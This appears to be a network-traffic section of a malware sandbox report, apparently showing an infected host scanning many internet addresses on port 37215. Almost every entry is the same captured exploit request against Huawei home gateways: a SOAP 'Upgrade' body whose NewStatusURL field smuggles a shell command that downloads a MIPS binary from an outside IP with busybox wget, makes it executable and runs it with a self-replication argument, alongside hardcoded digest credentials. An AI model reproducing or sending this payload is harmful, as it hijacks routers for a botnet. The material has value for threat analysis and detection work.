                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192.168.2.1339264197.93.16.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651740074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.1356014157.180.173.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651748896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192.168.2.1353048157.35.60.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651771069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192.168.2.135623441.74.194.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651810884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192.168.2.136021614.200.223.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651814938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.1333256157.46.117.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651814938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.1359544157.238.133.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651825905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.134580876.254.221.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651858091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.1348730157.158.61.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651884079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.1357682157.239.105.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.651912928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 